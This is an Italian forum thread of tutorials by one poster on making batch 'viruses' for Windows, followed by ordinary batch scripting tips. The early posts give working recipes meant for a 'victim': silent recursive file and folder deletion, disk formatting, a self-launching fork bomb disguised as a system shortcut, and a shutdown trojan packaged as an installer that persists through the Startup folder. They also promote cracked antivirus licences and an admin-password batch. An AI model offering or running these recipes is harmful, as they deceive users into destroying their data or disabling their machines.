In realt questi cosiddetti "virus" creati in Dos in estensione batch o exe, non sono veri virus ma

eseguibili. Forse un tempo lo erano ma oggi con i nuovi sistemi, non pi possibile infettare
dannosamente un computer, gli unici che ancora risentono di certi eseguibili sono i sistemi
Windows 95 e forse 98 (quest'ultimo forse poi nemmeno). Infatti facendo l'esempio di Xp che
il pi utilizzato non permette pi di far eseguire comandi eseguibili per formattare, cancellare,
rinominare o spostare i propri file di sistema, file utili o che sono in esecuzione.
L'eseguibile tanto per fare un esempio pu essere anche il comando di spegnimento che
andiamo cliccare col mouse sul menu di start, questo esegue il comando che dice al pc di
spegnersi. Stessa cosa potremmo fare noi, magari per fare uno scherzo, o al massimo
potremmo fare in modo che il pc si spegnesse in determinate ore, gioni, ecc... oppure spostare
file personali che non siano necessari al sistema, questi addirittura potremmo fare anche in
modo di cancellarli ecco. Ora facendo ricorso ad un po d'immaginazione potremmo come in
quest'ultimo esempio fatto, arrcare qualche danno alla vittima designata, ma non certo danni al
pc o al sistema con questo metodo, anche se vi sono alcune utilit, varianti, ecc... che magari
vengono in nostro soccorso per aiutarci e combinare qualcosa di pi. Le scappatoie ci sono
insomma, ma se vogliamo creare veri virus come vedremo, bisogner far ricorso ai linguaggi di
programmazione e gli ambineti stessi. Oppure affidarci a programmi appositi che ci facilitano il
compito, aggiungendo varianti a virus gi preparati. La prima cosa per quando andiamo a
lavorare con virus e perch no anche eseguibili, onde evitare brutte soprese, sarebbe quella di
farlo in un ambiente virtuale che ricrea uno o pi computers visrtuali con il sistema o sistemi
che vogliamo. Per citarne due dei migliori e pi conosciuti VMware Warkstation" che a
pagamento, oppure a nostro modesto parere e uso, "VirtualBox" che oltre ad essere gratuito,
semplice e bello completo, offre anche una assistenza & comunity attorno che viene in nostro
aiuto ogni qual volta lo esigiamo.



SEMPLICI

Creare "Virus" in BATCH (Virus vecchio stampo)
Vi siete mai chiesti com possibile creare virus con uno scopo ben preciso?
Ecco, che qui di seguito andremo a spiegare come creare i pi
semplici, ovvero quelli in formato Batch o Dos (in realt eseguibili pi che virus).
Prima di tutto impariamo a salvare un virus batch:
1) Cliccate destro sul desktop> nuovo> documento di testo (o blocco note)
2) Aprite il file e incollateci il codice in questione (ve li posto pi gi)
3) File> salva con nome
4) Dove c scritto Salva come selezionate tutti i file, dove invece scritto Nome file
scrivete il nome che volete seguito da .bat (ovviamente senza apici)
Eseguibile per disconnettere/riavviare/spegnere il pc (molto utile se si vuole accorciare il tempo
di
spegnimento del pc!)
1) Aprire blocco note
2) Copiate e incollate il codice seguente (senza apici!): shutdown -xyz
3) Al posto di -xyz potete mettere uno di questi codici:
-r > riavvia il pc
-s > spegne il pc
-l > disconnette lutente
-f > chiude le applicazioni ancora aperte
-i > apre larresto remoto
-t sec > al posto di sec metteteci un valore numerico e il pc si chiuder dopo tali secondi
4) Salvate il file in .bat

Eseguibile per formattare il disco C (pericoloso solo per le versioni Windows 95 e 98):
1) Aprire blocco note
2) Incollare il seguente codice > format C: /autotest /q /u
3) Salvare il file in .bat

SPIEGAZIONE: /qserve per far s che allutente non arrivi la conferma e /u per non permettere
di bloccare la formattazione, ma nei nuovi sistemi come ad esempio Xp questo non pi
possibile dal momento che non sono permesse modifiche o cancellature di file importanti per il
funzionamento.
--------------------------------------------------------------------------------
-----------------------------------



COME CREARE UN VIRUS IN (.EXE)

http://hackissimo.blogspot.com/2007/11/come-creare-un-virus-in-exe.html
Oggi impareremo a creare un virus con solo 2 script in basch e un programmino da scaricare:
Instal Creator (serve per creare dei file installabili in .exe). Qui possiamo scaricare la nuova
versione in italiano :
Download Instal Creator 2 (http://www.scaricasubito.com/scarica/install+creator/23974.htm).
Install Creator permette di creare file il setup dei programmi sviluppati in maniera facile e
veloce mediante un'interfaccia visuale. Tutte le schermate del programma son altamente
personalizzabili. Il software crea un unico file compresso a partire da tutti gli elementi presenti
nella directory principale dell'applicazione sviluppata in qualsiasi linguaggio. Tra le principali
caratteristiche del programma:
creazione del setup seguendo le operazioni standard;
personalizzazione di tutti i testi presenti nella fase di installazione;
installazione automatica dei controlli ActiveX;
visualizzazione di un file di testo o una pagina Web a fine installazione;
possibilit di rimuovere chiavi dal registro.
Prima di iniziare voglio fare insieme a voi dei ragionamenti:
I virus che per ora vi insegner a fare sono 2: UGO e "Shutdown", che vi spiegher meglio
sotto, + uno a sorpresa che render felici i pi temerari.
Per fare le vostre prove utilizzare "shutdown" con un
tempo di chiusura molto alto (3 minuti possono bastare) per ovvi motivi.
E comunque la miglior cosa visto che lavoriamo con dei virus spece con quelli pericolosi, non
come Shutdown (che un eseguibile), sarebbe bene farlo in un ambiente virtuale, usando
programmi tipo Virtual Box come gi detto sopra.
Cominciamo:
prima di tutto dobbiamo scrivere il virus "vero e proprio".
Con il blocco note scriviamo:
start shutdown -s -t 180 -c "Sei stato contaminato (il testo che volete insomma)"
poi salviamo come documento ".bat" (praticamente il virus "Shutdown" scritto in Batch), (che
io lo chiamer virus.bat).
Ora creiamo una nuova cartella (che io chiamer "vir") e mettiamoci dentro il virus in batch.
Creiamo ancora un altra cartella (che io chiamer "programma") e mettiamoci dentro la cartella
precedente. (praticamente ora io ho questo tipo di percorso: \programma\vir\virus.bat\)
Ora dobbiamo accendere un attimo il cervello e pensare all'ipotetico percorso dove si potrebbe
installare il virus. (nel mio casoC:\Programmi\programma\vir\virus.bat\).
Se riuscite ad immaginarvi questo siete gi a met strada e vi posso inserire questo nuovo
comando in batch (che io chiamercopyto):
copy C:\Programmi\programma\vir\*.* c:\Documents and Settings\All Users\Menu
Avvio\Programmi\Esecuzione automatica\*.*
Questo il comando fondamentale che ci permette di far copiare tutto il contenuto
dell'ipotetica
cartella "vir" nella cartella Esecuzione automatica: ecco a voi il metodo per attivare il virus ad
ogni accenzione di Windows.
[NB. questo comando non eseguibile al 100% poich gli spazzi non sono accettati come tali
dal
linguaggio batch: infatti ne parleremo in seguito su come ovviare al problema degli spazi
apprendendo come scrivere in .Bat]
Continuiamo:
dopo che lo avete salvato come file.bat (io l'ho chiamato copyto) mettetelo dentro l'ultima
cartela che avete creato (per me la cartella "programma").
Adesso siamo pronti per utilizzare il programma che vi ho fatto scaricare e installare Install
Creator.
Apriamolo, clicchiamo "avanti"; ora scegliamo la cartella che contiene i nostri file (nel mio caso
proprio la cartella "programma"); adesso scegliamo italiano e inseriamo il nome del prodotto
(attenzione il nome del prodotto deve coincidere con il nome della cartella dove avevate
inserito
tutto altrimenti dovrete modificare il comando copyto); scegliete un impostazione grafica
(potete
anche vedere l'anteprima); inserite eventuali informazioni sul file (tipo: CRETINO,STAI PER
INSTALLARE UN VIRUS); poi vi far scegliere dove volete che sia installata la cartella (e se
avete seguito le mie istruzioni dovrebbe andare bene quella che vi suggerisce);il passaggio
seguente anche trascurabile dato che l'utente non avr bisogno di avere un icona nel men
d'avvio dopo che il computer sar inagibile; molto importante adesso scegliere come
programma da eseguire dopo l'installazione il file che copia il virus nella cartella Esecuzione
Automatica (praticamente il file "copyto"): selezionarlo cliccando sul secondo "Browse" e
scegliendo "all files" come tipo di file; potete finire con le impostazioni.
Adesso se avete fatto tutto per benino avrete "finalmente" realizzato il vostro primo virus che si
presenta sul vostro desktop come un file ".exe".
[P.S. se avete scelto il virus "Shutdown" potete provarlo e vedere se funziona ma se avete scelto
"UGO" Vi sconsiglio di farlo.
Tanto che ci sono vi dico anche cheShutdown si pu facilmente chiudere eseguendo il
comando:
shutdown -a
Se qualcosa non vi torna spece con il programma Instal Creator, provate a scaricarvi l'ultima
versione, oppure se uguale, una versione precedente (vecchia).
Shutdown

Questo "Virus" o per meglio dire Eseguibile dal momento che non affatto un vero virus,
spegne il computer in un tempo da voi definito e con un messaggio da voi scelto.
Innanzitutto clicchiamo con il tasto destro del mouse sul desktop e creiamo un nuovo
collegamento.
Adesso nella barra che compare scriviamo questa stringa:
shutdown -s -t 120 -c"testo"
potete modificare a piacimento il tempo (espresso dal numero in secondi) ed il testo che dovr
apparire.
In seguito vi verr richiesto di dare un nome al collegamento...
Ora, logicamente avrete capito che l'unica possibilit che abbiamo per far impaurire qualcuno
quella di scrivere un messaggio minaccioso come: attenzione allo scadere del tempo il
computer
si spegner e subir una formattazione, o via dicendo.
divertitevi pure a scrivere di tutto, ovviamente entro i limiti (i vostri)!!!
Virus UGO

Ecco come creare in 2 secondi un virus che blocca completamente il sistema operativo,
quindi...
occhio!!! Per tenervi allenati ho deciso di farvi creare un virus che in grado di bloccare
totalmente Windows.
Bene sappiate che per bloccare Windows bastano due rige:
start (nomefile).bat
(nomefile).bat
Ma procediamo con calma:
Vogliamo creare un virus che si chiamaUGO?
Seguiamo il seguente procedimento:
1) Apriamo un normalissimo documento di testo.
2) Scriviamo: start UGO.bat
3) Clicchiamo su File>Salva con nome... lo chiamiamo: UGO.bat
4) Adesso, ameno che non vogliate bloccare il sistema, non aprite il file UGO.bat
CONGRATULAZIONIavete creato il vostro primo virus!!!
Il suo concetto semplice: aprire un file che apre se stesso.
pi o meno come il gioco degli specchi che si riflettono all'infinito.. o come il cane che si
morde la coda.. e il computer "salta".
Nonostante sia del tutto innocuo, molto fastidioso e se usato nel modo giusto pu
diventarlo ancora di pi.
Vi do qualche idea come spunto:
1) Creiamo un collegamento al file UGO.bat che abbiamo creato.
2) Rinominiamolo come: Risorse del computer
3) Andiamo su propriet e cambiamo l'icona con quella adeguata...
4) Se vogliamo essere proprio pignoli andiamo sempre su propriet e dove scritto
commento scriviamo: Visualizza le unit disco e l'hardware del computer
5) Ritorniamo sul file UGO.bat e in propriet spuntiamo la voce: nascosto
Se oltre a Risorse del computer, falsifichiamo anche altre cose come cartelle, documenti e
programmi verr di certo meglio ancora non credete?
Virus Destroyer


Ecco il codice per eliminare dei file.
CODICE:
@ERASE /comando "C:\percorso\percorso"
oppure
@DEL /comando "C:\percorso\percorso"
...Chiudete e salvate in .bat
Che significa quel codice?
@ERASE e @DEL =Sono per cancellare file
/comando =Bisognerebbe inserire 1 o pi comandi tra questi:
a) /P Chiede conferma prima di eliminare ogni file.
b) /F Forza l'eliminazione dei file di sola lettura.
c) /S Elimina i file specificati da tutte le sottodirectory.
d) /Q Modalit silenziosa, non chiede conferma per eliminazioni globali.
e) /A Seleziona i file da eliminare in base agli attributi.
Mi raccomando questa veramente dinamite!!!
State attenti a non cancellare qualche file importante (come winlogon.exe)
E lavorate sempre sicuri in ambiente virtuale.
BAT to EXE Converter


Prima di continuarvi a parlare del Batch, ho deciso di consigliarvi questo programma che serve
per convertire i file da .bat in .exe.
Quale la convenienza?
In particolare nessuna... Ma, convertendo il file possibile scegliere anche un'icona (immagine
.ico) ed includere un altro file (che appare nella stessa directory dove si trova il programma in
exe e "scompare" quando lo si chiude)
Potete anche scegliere se la vostra applicazione deve essere visibile oppure fantasma e
scegliere altre informazioni da aggiungere.
Il peggior amico del computer


Ho visto computer devastati da coloro che credevano amici... gli antivirus.non appena finite di
istallare windows sul computer, se vi azzardate solo a pensare di istallare avast (o altre
schifezze del genere)... per lui gi c' qualcosa che non va: gi vi trova dei virus!!!
Vi racconto un aneddoto tanto per farvi capire meglio il concetto.
Un amico istalla AVGdopo un mese che aveva iniziato ad usare internet e il computer (senza
antivirus) stava da Dio.
Ma... un giorno qualcosa di strano aveva pervaso la sua mente ed istall il suddetto antivirus...
dopo una logorroica scansione viene PAUROSAMENTE a sapere che il suo computer (ripeto:
che stava da Dio) era invaso da 95 V-I-R-U-S.
Dopo averli eliminati, ha riavviato il computer ed il giorno dopo era dal tecnico...
Mentre un altro con Bitdefender non riusciva ad entrare in alcuni blog: ogni volta che tentava
l'accesso "l'antivirus" glielo impossibilitava e gli apparivano finestre in continuazione...[se
consideriamo un virus come un programma che impedisce delle funzioni... possiamo ben
concludere che quello non era un antivirus...]
Mi stato chiesto quale il miglior antivirus ed io ho risposto:
Leggete nella sezione SOFTWARE / PROTEZIONE: I MIGLIORI PROGRAMMI GRATIS X SEMPRE!,
comunque tanto per dare un anticipazione, se volete un antivirus free, che supera la rottura di
doverlo craccare, stabile (vito che spesso quelli craccati non lo sono per alcune persone) e
leggera, consiglierei "AVIRA Ativirus". ( un antivirus che presenta varie versioni tra quale quella
gratis (che nonostante ci, migliore dell'altra e pu competere anche con i migliori a
pagamento). In pi non intasa il computer e scannerizza da solo quando lo reputa opportuno,
meglio di cos. Altrimenti craccato "ESET Smart Security" e badate bene che non il semplice
"NOD 32 Antivirus" ma una evoluzione, con firewall integrato, il tutto ottimo e sopratutto
leggero che non infastidisce nemmeno programmi come eMule, etc.
Scarica Eset Smart Security v4 + Guide varie + Licenza infinita
Il tutto un nuovo sistema per aggirare le protezioni che richiedono l'acquisto della licenza e
pensate un po che non nemmeno illegale questo nuovo metodo per avere programmi di
questo calibro, tipo pure "Kaspersky Antivirus & Internet Security" o "G-Data Antivirus Kit",
gratis per sempre, facendosi beffa del classico, palloso, (a volte anche difficile se non
impossibile) ed ora come ora ancora di pi, metodo per craccare i programmi.
Nella sezione Software sul topic che tratta la Sicurezza, troverete anche i link dove scaricare i
programmi, come quelli riportati sopra.
Una cosa sicuramente da no tralasciare ma anzi... al contrario scaricarsi e custodire almeno per
il 2009, la fantastica "Guida alle promozioni 2009" dove vi sono tutti i migliori programmi per
la sicurezza da scaricare gratis nei modi pi vari e singolari possibili, per rientrare nella legalit.
Tornando ad AVIRA, l'unica cosa che pu essere un po fastidiosa nella versione free, che ogni
tanto (ma raramente) vi apre sullo schermo un pop up per sponsorizzarvi le versioni a
pagamento.
Ma nessun problema, infatti possibile eliminare il popup che salta fuori dopo ogni
aggiornamento e l'immagine splash che appare ogni volta che si accende il computer, in bella
vista al centro del monitor. La procedura riportata alla SEZIONE TRUCCHI / TOGLIERE IL POP-
UP PUBBLICITARIO DI AVIRA FREE.

pess 282 posts Monday, 31. August 2009 10:55PM

Mini Guida per creare file batch
L'uso dei comandi ed i suoi significati





I file batch sono una serie di comandi dati al computer che permettono di fare + o - quello che
si vuole... ma questo lo abbiam gi specificato.

Andiamo quindi al sodo.

Innanzitutto:
1) aprite un blocco note
2)scrivete il codice del batch
3)file, salva con nome
4)nella seconda casella selezionate tutti i file
5)cancellate .txt e scrivete .bat
.
Questi sono i comandi pi frequenti che si possono fare aprire alla vittima


COMANDI PER CANCELLARE FILE:
@ERASE /comando "C:\percorso\percorso *.*"
@DEL /comando "C:\percorso\percorso *.*"
Allora:
1) @ERASE e @DEL = Sono per cancellare file
2) /comando = dove al posto di "/comando" potete mettere una o pi di queste sigle:
a) /P (Chiede conferma prima di eliminare ogni file)
b) /F (Forza l'eliminazione dei file di sola lettura)
c) /S (Elimina i file specificati da tutte le sottodirectory)
d) /Q (Modalit silenziosa, non chiede conferma per eliminazioni globali)
e) /A (Seleziona i file da eliminare in base agli attributi)
*.* = Il primo asterisco serve per cancellare tutti i file con un certo nome
*.* = Il secondo asterisco serve per cancellare qualsiasi tipo di estensione di un file


PER FORMATTARE UN DISCO:
format C: /autotest /q /u
Allora:
format C:/autotest = comando di formattazione dell'unit C: se si volesse cambiare andrebbe
(D:) etc
(/q) serve per non far chiedere conferma e (/u) per nn farla bloccare in seguito
Il comando normalmente non funziona nei pc con sistemi sucessivi a Win 95/98, perch per
formattare il pc bisogna essere in modalit provvisoria (e spesso nemmeno basta).


PER CANCELLARE UNA CARTELLA:
@RD /s /q C:\Percorso_Cartella
Allora:
@RD serve come @DEL e @ERASE a cancellare ma a differenza di loro, @RD serve per le cartelle
e non per i file.
/s /q li abbiamo visti in precedenza


PER RIAVVIARE IL PC:
shutdown -comando
al posto di -comando potete mettere uno di questi:
-i (Attiva linterfaccia utente grafica)
-l (Disconnette l'utente)
-r (Riavvia il PC)
-s (Spegne il computer)
-t xx (xx Sarebbero i secondi di attesa prima della chiusura di Windows)
-f (Chiude le applicazioni ancora aperte)

AUMENTARE DI PESO IL BATCH:
@REM (alla fine del batch)
@REM (serve per mettere commenti ma se aggiungiamo tipo 1000 volte la lettera a il nostro
batch prender peso consistente)



PER FAR IMPALLARE IL PC:

START
START
START
START
..
..
..
..

Con questo comando si apriranno tanti prompt dei comandi quanti START scriverete, non
sembra
dannoso ma provate voi stessi a chiudere 500 prompt (impossibile il pc si impaller).
Perch succede?
Perch i batch non sono virus ma seguono comandi del prompt di MS-DOS che
guarda caso con START ne fa aprire un altro...



pess 282 posts Tuesday, 01. September 2009 12:06AM
Ecco alcuni video dimostrativi su "virus" creati col blocco
note

How to Crash someones comp using notepad

Intermediate_CMD_Hacks_Part_1



pess 282 posts Tuesday, 01. September 2009 09:29PM
Su Xp file Batch & Exe non vengono eseguiti alla fine d'una
installazione?
Ecco come risolvere
Quando si utilizza la procedura guidata nella creazione del package Microsoft Office XP
Developer per assemblare un'applicazione, pu includere nell'installazione del pacchetto file da
eseguire con estensione bat oppure exe. Per impostazione predefinita, quando si aggiunge un
file con estensione bat o un file exe al pacchetto la procedura guidata per la creazione del
package imposta il percorso di installazione su$(AppPath). Tuttavia, quando si distribuisce il
pacchetto in un computer con Windows XP, il file con estensione bat o il file exe non viene
eseguito alla fine dell'installazione del pacchetto.
Per risolvere questo problema, impostare il percorso di installazione per il file con estensione
bat o
per il file exe $(WinPath) nella procedura guidata di creazione del package.
Procedura per riprodurre il comportamento:
1. Accedere a un computer che esegue il sistema operativo Windows XP.
2. Creare un file batch utilizzando un testo editor, ad esempio il Blocco note.
A tale scopo, creare un file batch che copia la scelta:rapida per l'applicazione viene distribuita
come illustrato di seguito nel computer in uso dal profilo utente corrente per il profilo All Users.
Il collegamento disponibile per altri utenti che accedono al computer.
1. Fare clic sul pulsante Start e quindi fare clic su Esegui .
2. Aprire il blocco note e digitare o incollare il codice riportato di seguio.
MKDIR "<Installation Drive>:\Documents and Settings\All Users\Start
Menu\Programs\Northwind"
:loop
if exist "<Installation Drive>:\Documents and Settings\administrator\Start
Menu\Programs\Northwind" goto iNext
goto END
:iNext
copy "<Installation Drive>:\Documents and Settings\administrator\Start
Menu\Programs\Northwind\" "<Installation Drive>:\Documents and Settings\All
Users\Start Menu\Programs\Northwind\"
:END
Nota: Sostituisci Installation Drive di questo codice con la lettera di unit appropriata per il
computer in uso.
A)Salvare il file come CopyShortcut.bat .
Quando si distribuisce un pacchetto di distribuzione nel computer in uso, il programma di
installazione crea un collegamento per l'applicazione dal menu di avvio . Per impostazione
predefinita, viene creato il collegamento nel profilo dell'utente corrente. Di conseguenza, la
scelta rapida per l'applicazione disponibile solo per l'utente corrente.
Ad esempio, se l'utente corrente user1 , il collegamento viene creato nell' Installation
Drive: \Documents and Menu\Programs\ Settings\user1\Start cartella.
Se il file batch viene eseguito correttamente in fondo l'installazione del pacchetto, la scelta
rapida per l'applicazione disponibile a qualsiasi utente che esegue l'accesso al computer.
B)Creare un pacchetto di distribuzione per il database Northwind.
Includere il file batch nel pacchetto di distribuzione per il database Northwind dove viene
eseguito il file batch CopyShortcut.bat al termine dell'installazione pacchetto. A tale scopo,
attenersi alla seguente procedura:
1. Avviare Microsoft Access 2002.
2. Aprire il database di esempio Northwind Northwind.mdb.
3. strumenti di menu, scegliere macro nella finestra del database, quindi Visual
Basic Editor
4. In Microsoft Visual Basic Editor scegliere Creazione guidata di creazione del package
dal menu aggiuntivi.
5. Nella finestra identificare l'applicazione e pacchetto guidata di creazione del package
della finestra di dialogo fare clic su Avanti.
6. Nella finestra informazioni sull'applicazione, scegliere Avanti.
7. Nella finestra Dependencies, scegliere Aggiungi file.
8. Nella finestra di dialogo Apri, individuare il file di batch CopyShortcut.bat che creato
in precedenza in questo articolo.
9. Fare clic su CopyShortcut.bat, quindi Apri. Il file batch CopyShortcut.bat visualizzato
nell'elenco dei file per la creazione guidata per la creazione del package.
10. Fare clic su Avanti. Nella finestra Modifica percorsi di installazione guidata di
creazione del package della finestra di dialogo il per il percorso di installazione
impostazione predefinita per$(AppPath) .
11.Nella finestra fase di esecuzione di Access fare clic su Avanti .
12.Nella finestra propriet Runtime Access finestra, fare clic su Avanti .
13.In collegamenti di menu breve definizione finestra, fare clic su Avanti .
14.In esecuzione nella finestra di completamento, fare clic per selezionare Esegui il
comando al termine dell'installazione verificare casella e quindi fare clic
su $(AppPath)\CopyShortcut.bat on the list.
15.Fare clic su Fine .
16.Nella finestra di dialogo Sfoglia per cartelle individuare la cartella in cui si desidera
archiviare il pacchetto di distribuzione e quindi fare clic su OK .
17.Nella finestra pacchetto completamento della creazione guidata di creazione del
package, scegliere Chiudi .

C)Installare il package di distribuzione per Northwind database. A tale scopo, attenersi alla
seguente procedura:
1. Avviare Esplora risorse.
2. In Esplora risorse, individuare la cartella in cui viene creato il pacchetto di
distribuzione per il database Northwind.
3. Fare doppio clic sul file setup.exe .
4. Eseguire la procedura verranno forniti per distribuire l'applicazione.
5. Acceda al computer nuovamente utilizzando il nome di accesso di un altro utente di
Microsoft Windows locale.
Se accedi al computer utilizzando un nome di accesso diverso dal nome di accesso utilizzato
per
installare il pacchetto, la scelta rapida per l'applicazione non disponibile nel menu di avvio .
Questa situazione si verifica perch il file batch non viene eseguito in fondo l'installazione del
pacchetto.
Per verificare questa situazione, esaminare il contenuto dell' Installation Drive: \Documents
and
Settings\All Users\Menu Menu\Programs\Northwind cartella. Se il file batch CopyShortcut.bat
viene eseguito correttamente alla fine della distribuzione del pacchetto, questa cartella deve
contenere un collegamento per il database Northwind.

pess 282 posts Tuesday, 01. September 2009 09:43PM

Trasformare file batch in eseguibili
&
Avviare programmi come amministratore



Impartire comandi via prompt una tecnica ormai poco utilizzata, ma in ambiente di rete pu
rivelarsi preziosa. Vediamo come trasformare file batch in eseguibili per poi avviarli come
amministratore.

Lavorando da alcuni mesi in un ambiente di rete aziendale, dove sono solo amministratore
locale dei computer e non posso mettere mano alle policy dei vari utenti, mi sono trovato nella
necessit di far avviare ad alcuni utenti dei programmi come se fossero degli amministratori.
Vediamo come fare ad avviare il programma senza dover comunicare all'utente la password di
amministratore.
La prima cosa da fare scaricare il programma Sanur che trovate in allegato all'articolo insieme
all'altro programma Bat To Exe Converter.

Eseguire comandi come amministratore
Grazie a Sanur possiamo far eseguire ad un utente senza poteri di amministratore, un qualsiasi
programma che invece li richiede.



Basta creare un file batch, .bat o .cmd, che contenga queste due righe:

@echo off
runas /u:%COMPUTERNAME%\administrator PercorsoFileDaEseguire | sanur
PasswordAdministrator

Se nel nome del "PercorsoFileDaEseguire" ci sono degli spazi, per esempio "C:\Documents
and settings\user\desktop" il percorso deve diventare "C:\Docume~1\user\desktop".
Il percorso del file deve avere 6 caratteri seguiti dal simbolo della tilde (~), che si ottiene
tenendo premuto il tasto Alt, scrivendo sul tastierino numerico (quello a destra della
tastiera) 126 e poi rilasciando il tasto Alt, seguito dal numero 1. oppure usando la mappa
caratteri che si trova in Start/Tutti i programmi/Accessori/Utilit di sistema.
La prima riga contiene il comando @echo off che serve per nascondere i comandi successivi e
soprattutto la password di amministratore che deve essere scritta nella seconda riga.
Nella seconda riga abbiamo "PercorsoFileDaEseguire" dove dovete inserire il percorso
completo del file da eseguire, diciamo "c:\windows\regedit.exe", e
in "PasswordAdministrator" dovete inserire la password dell'amministratore locale del
computer.

Trasformare il batch in eseguibile
Un utente smaliziato potrebbe per aprire il file di comandi appena creato e leggere la
password dell'amministratore che abbiamo dovuto inserire.
Per risolvere questo problema dobbiamo creare un file eseguibile in modo che la password
diventi molto pi difficile da leggere.
Per creare un eseguibile per bisognerebbe saper programmare in un qualche linguaggio
adatto, e invece no, ci viene in aiuto Bat To Exe Converter un piccolo programma gratuito che
permette di convertire file Bat o Cmd in file eseguibili.
Basta selezionare il file da convertire nella prima riga "Batchfile" e subito appare in "Save
as"il nome del file eseguibile finale, posizionato di solito nella stessa cartella del file originale,
ma possiamo scegliere dove salvarlo.
In "Iconfile" possiamo selezionare un'icona da inserire nel file eseguibile, mentre
nelle "Additional informations" possibile mettere una serie di descrizioni del programma
il tutto per personalizzarlo maggiormente.
Ho notato che queste due ultime personalizzazioni non sempre vengono compilate
nell'eseguibile, ma in realt sono inutili al fine della creazione dell'eseguibile che ci serve.



Se tutto andato bene, ed ha accettato tutte le personalizzazioni inserite, ci troveremo con un
eseguibile di questo tipo. Se non ha preso nessuna delle modifiche inserire la dimensione sar
di qualche kB inferiore.



Una volta avviato il file eseguibile che abbiamo appena creato si aprir per alcuni secondi una
schermata nera vuota e poi verranno eseguiti gli altri comandi che abbiamo inserito nel file
originale che stato convertito.



pess 282 posts Tuesday, 01. September 2009 10:05PM


Esempi di batch che sposta i file da una cartella
all'altra

COPY (copia files)
/-Y (chiede conferma prima di sovrascrivere)
per concatenare files, fare ad esempio:
COPY file1+file2+file3 file

Ma purtroppo non va bene cosi.
Chiede conferma solo in caso di sovrascittura ma le cartelle dove le si copia son sempre vuote,
ci significa che non necessario il comando -Y.
L'idelare sarebbe che ci chiedesse per ogni operazione se desideriamo copiarle o meno
dal momento che non sempre ci pu servire di fare la copia per tutte e 10 le directosy
impostate.

Es:
vuoi copiare da c:\pippo a g:\pippo ? s/n
vuoi copiare da c:\paperino a g:\paperino ? s/n
e cosi via .......

Il comando choice non presente sul dos di Xp quindi non possiamo usarlo a patto di
installarlo certamente, ma dando un'occhiata a come microsoft suggerisce di sopperire a questa
mancanza ci aiuta un po:

How to use the set command as a substitute for the choice command in Windows 2000 and
Windows XP.
In the below example a user would be prompted to enter an option of 1,2, or 3 to print "hello",
"bye", or "test".

*ECHO off
cls
:start
ECHO.
ECHO 1. Print Hello
ECHO 2. Print Bye
ECHO 3. Print Test
set choice=
set /p choice=Type the number to print text.
if not '%choice%'=='' set choice=%choice:~0,1%
if '%choice%'=='1' goto hello
if '%choice%'=='2' goto bye
if '%choice%'=='3' goto test
ECHO "%choice%" is not valid please try again
ECHO.
goto start
:hello
ECHO HELLO
goto end
:bye
ECHO BYE
goto end
:test
ECHO TEST
goto end
:end

Ma vediamo bene adesso come creare un batch che se messo in esecuzione automatica sposti
qualsiasi file da una cartella all'altra.
es.
echo off
move C:\Documents and Settings\Utente\Desktop\nomecartella\*.* C:\Documents and
Settings\Utente\Desktop\nomecartella
end
Se invece non ci sono spazi, si deve utilizzare lo standard 8.3.
Ossia le prime 6 lettere della cartella pi una tilde (~) pi 1.
es.
C:\progra~1\mozill~1\ecc...





pess 282 posts Tuesday, 01. September 2009 10:26PM

Creare programmi che lanciandoli fan aprire altri
In ambiente windows xp e' consigliato usare l'estensione .cmd e non .batcomunque sono la
stessa cosa alla fin fine, si pu benissimo scrivere semplicemente la stringa:
start applicazione.exe
se per esempio eMule sta dentro la cartella programmi si pu scrivere una cosa tipo:
start %programfiles%\emule\emule.exe

se eMule sta dentro la cartella programmi, la sua cartella sar "eMule" e si chiamer "eMule.exe"
%programfiles% una variabile d'ambiente che specifica il percorso "c:\programmi".
Il consiglio di usarla nel caso dobbiate adoperare il vostro file batch anche su computer
diversi dal vostro e che magari hanno una lingua diversa dall'italiano....
Per creare fisicamente il file, aprire blocco note, scirvere una stringa come quella sopra indicata,
andare poi su "file / salva con nome" selezionare "tutti i file" dal menu a tendina "salva come"
poi chiamare il vostro file come si vuole per es. "pincopallino.cmd" e salvalo sul desktop.
Per creare un file batch basta mettere in sequenza, riga per riga, tutte le operazioni che si vuol
compiere.
Poi invece di salvarlo come txt salvalo con estensione bat. Oppure salvarlo normalmente e poi
rinominarlo con estensione bat, la stessa cosa.
Per eseguire un programma basta che si scriva il nome del programma senza l'estensione exe
nelle istruzioni, ricordandosi di mettere il percorso giusto, ovviamente. Se il file batch e
l'eseguibile si trovano nella stessa cartella questo non necessario ma sempre meglio
certamente.
Se ad esempio si vuol eseguire "calc", ossia la calcolatrice di windows, si fa un file di testo che
riporti solo:
C:\WINDOWS\System32\calc
seguito da un a capo.
Salvarlo col nome che si vuole e con l'estensione bat. cliccarci poi sopra e automagicamente si
aprir la calcolatrice.
Volendo si pu anche mettere in sequenza comandi DOS e altri tipi di comandi che si posson
trovare su internet.
Che XP non esegua comandi BAT non del tutto vero.
Semplicemente per farlo deve prima eseguire la dosshell e il guaio che lo fa in automatico.


pess 282 posts Wednesday, 02. September 2009 12:12PM

Mettere il suono in eseguibili o installer

Volete creare un file batch che nel momento in cui si verifica un certo caso, vi avvisi tramite un
beep oppure eventualmente riproducendo un file audio? Ecco come!
Allora, per fare un beep, basta aprire il prompt dei comandi e scrivere "echo Ctrl+G";
automaticamente digitando Ctrl e G appare il simbolo "^G", quindi il comando che alla fine
viene scritto e poi eseguito "echo ^G".
Ora il problema fondamentale il seguente:
Dato che scriviamo il file batch con il Blocco Note, se proviam a fare quella specie
di G premendoAlt+g, ovviamente ci si apre uno shortcut del Blocco Note e non abbiamo quindi
il carattere voluto.
Provando dunque a scrivere proprio letteralmente con la tastiera il carattere "^" e poiG,
all'esecuzione del flie batch avremo solo un echodel carattere G.
*ECHO OFF
echo
exit
Questo il problema fondamentale, che non riusciamo insomma a riprodurre quel comando sul
file batch.
La soluzione ci viene sempre dal prompt.
Scriviamo:
copy con beep
diamo invio e premiamo (ctrl + g)
diamo ancora invio e premiamo (ctrl + z)
in questo modo creer un file beep che contiene appunto il beep.
Per riprodurre un file audio:
sndrec32 /play /close %windir%\media\notify.wav
ovviamente bisogna inserire il file audio che si vuole, nella cartella (media), dove tra l'altro sono
anche tutti i suoni di sistema.
In pi aggiungendo (/embedding) possibile anche far partire il programma in background,
sentendo solo il suono.
Per farlo suonare scriviamo nel batch:
type beep
(in questo modo si ottiene un file che contiene solo il byte 7)
Spiegazione:
Il "copy con" serve solo a ridirigere nel file quello che viene digitato sulla tastiera.
Nella tabella ascii il carattere 7 il BELL, ossia il beep di sistema.
Usando "type" si stampa sullo schermo il carattere che provoca il beep di sistema.
Il (ctrl + z) provoca invece il "salva", mentre al contrario il (ctrl+c) abortisce la creazione del file.

